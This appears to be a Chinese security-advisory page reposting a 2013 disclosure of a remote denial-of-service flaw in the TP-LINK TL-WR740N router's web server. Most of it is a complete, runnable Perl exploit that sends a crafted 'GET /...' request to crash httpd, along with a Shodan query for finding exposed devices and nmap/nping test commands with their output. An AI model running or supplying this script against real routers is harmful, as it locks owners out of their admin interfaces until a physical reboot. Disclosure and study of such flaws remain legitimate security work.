WR740N路由器拒绝服务漏洞

发布日期:2013-03-21
更新日期:2013-03-22

受影响系统:
TP-LINK TL-WR740N v4.23
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58623
 
TL-WR740N是150Mbps的无线路由器。
 
TL-WR740N 3.16.4 Build 130205 Rel.63875n路由器在实现上存在远程拒绝服务漏洞。如果Web服务器(httpd)不在默认的TCP端口80上处理HTTP GET请求,攻击者发送一系列的三个点(...)到路由器,会致使httpd崩溃,用户将无法访问管理控制面板的管理界面。重启路由器后可以正常工作。
 
<*来源:Gjoko Krstic (liquidworm@gmail.com)
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/local/bin/perl
 #
 #
 # TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit
 #
 #
 # Vendor: TP-LINK Technologies Co., Ltd.
 # Product web page:
 #
 # Affected version:
 #
 # - Firmware version: 3.16.4 Build 130205 Rel.63875n (Released:
2/5/2013)
 # - Hardware version: WR740N v4 00000000 (v4.23)
 # - Model No. TL-WR740N / TL-WR740ND
 #
 # Summary: The TL-WR740N is a combined wired/wireless network connection
 # device integrated with internet-sharing router and 4-port switch. The
 # wireless N Router is 802.11b&g compatible based on 802.11n technology
 # and gives you 802.11n performance up to 150Mbps at an even more
affordable
 # price. Bordering on 11n and surpassing 11g speed enables high
bandwidth
 # consuming applications like video streaming to be more fluid.
 #
 # Desc: The TP-Link WR740N Wireless N Router network device is exposed
to a
 # remote denial of service vulnerability when processing a HTTP request.
This
 # issue occurs when the web server (httpd) fails to handle a HTTP GET
request
 # over a given default TCP port 80. Sending a sequence of three dots
(...) to
 # the router will crash its httpd service denying the legitimate users
access
 # to the admin control panel management interface. To bring back the
http srv
 # and the admin UI, a user must physically reboot the router.
 #
 #
 # ============================== Playground:
==============================
 #
 # Shodan: WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router
WR740N"
 #
 # # nmap -sV 192.168.0.1
 #
 # Starting Nmap 6.01 ( ) at 2013-03-19 04:53 Central
European Standard Time
 # Nmap scan report for 192.168.0.1
 # Host is up (0.00s latency).
 # Not shown: 999 closed ports
 # PORT  STATE SERVICE VERSION
 # 80/tcp open  http    TP-LINK WR740N WAP http config
 # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.)
 # Service Info: Device: WAP
 #
 # Service detection performed. Please report any incorrect results at
.
 # Nmap done: 1 IP address (1 host up) scanned in 12.42 seconds
 #
 #
--------------------------------------------------------------------------
 # Changed Probe Directive in nmap-service-probes file [4 d range]:
 # - Line: 4682: Probe TCP GetRequest q|GET / HTTP/1.0\r\n\r\n|
 # + Line: 4682: Probe TCP GetRequest q|GET /... HTTP/1.0\r\n\r\n|
 #
--------------------------------------------------------------------------
 #
 # # nping -c1 --tcp -p80 192.168.0.1 --data
"474554202f2e2e2e20485454502f312e310d0a0d0a"
 #
 # Starting Nping 0.6.01 ( ) at 2013-03-19 04:55
Central European Standard Time
 # SENT (0.0920s) TCP 192.168.0.101:19835 > 192.168.0.1:80 S ttl=64
id=21796 iplen=61  seq=1961954057 win=1480
 # RCVD (0.1220s) TCP 192.168.0.1:80 > 192.168.0.101:19835 RA ttl=64 id=0
iplen=40  seq=0 win=0
 #
 # Max rtt: 0.000ms | Min rtt: 0.000ms | Avg rtt: 0.000ms
 # Raw packets sent: 1 (75B) | Rcvd: 1 (46B) | Lost: 0 (0.00%)
 # Tx time: 0.04000s | Tx bytes/s: 1875.00 | Tx pkts/s: 25.00
 # Rx time: 1.04000s | Rx bytes/s: 44.23 | Rx pkts/s: 0.96
 # Nping done: 1 IP address pinged in 1.12 seconds
 #
 #
--------------------------------------------------------------------------
 #
 # # nmap -Pn 192.168.0.1 -p80
 #
 # Starting Nmap 6.01 ( ) at 2013-03-19 04:57 Central
European Standard Time
 # Nmap scan report for 192.168.0.1
 # Host is up (0.00s latency).
 # PORT  STATE  SERVICE
 # 80/tcp closed http
 # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.)
 #
 # Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
 #
 # ============================= !Playground
===============================
 #
 #
 # Tested on: Router Webserver
 #
 #
 # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 #
 # Copyleft (c) 2013, Zero Science Lab
 # Macedonian Information Security Research And Development Laboratory
 #
 #
 #
 # Advisory ID: ZSL-2013-5135
 # Advisory URL:

 #
 #
 # 17.03.2013
 #
 
use IO::Socket;
 
$ip="$ARGV[0]"; $port="$ARGV[1]";
 
print "\n\n\x20"."\x1f"x42 ."\n";
 print "\x20\x1f"."\x20"x40 ."\x1f\n";
 print "\x20\x1f  TP-Link TL-WR740N httpd DoS Exploit  \x1f\n";
 print "\x20\x1f"."\x20"x40 ."\x1f\n";
 print "\x20\x1f"."\x20"x7 ."\x16"x5 ."\x20"x15 ."\x16"x5 ."\x20"x8
."\x1f\n";
 print "\x20\x1f"."\x20"x9 ."\x16"."\x20"x19 ."\x16"."\x20"x10 ."\x1f\n";
 print "\x20" ."\x1f"x42 ."\n";
 print "\x20\x4" ."\x20"x40 ."\x4\n";
 print "\x20" ."\x1e" x 42 ."\n";
 
if($#ARGV<1)
 {
    print "\n\n\x20\x20\x1a\x20Usage: $0 <ip> <port>\n\n";
    exit();
 }
 
$socket=IO::Socket::INET->new(
 Proto => "tcp",
 PeerAddr => $ip,
 PeerPort => $port
 );
 
$ta4ke="\x47\x45\x54\x20".
        "\x2f\x2e\x2e\x2e".
        "\x20\x48\x54\x54".
        "\x50\x2f\x31\x2e".
        "\x31\x0d\x0a\x0d".
        "\x0a";
 
print "\n\x20\x1a\x20Sending evil payload...\n"; sleep 2;
 print $socket "$ta4ke"; sleep 5; close $socket;
 print "\x20\x1a\x20HTTPd successfully poked.\n"; sleep 2;
 print "\x20\x1a\x20Verifying with Nmap...\n"; sleep 2;
 system("nmap -Pn $ip -p $port");
 print "\n\x20\x1a\x20Playing goa-psy...\n"; sleep 2;
 system("start C:\\Progra~1\\Winamp\\winamp.exe
");
 sleep 1; print "\x20\x1a\x20All Done!\n"; sleep 1;
 
# Codename: Threetwoees

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://127.0.0.1/wyyjpw.html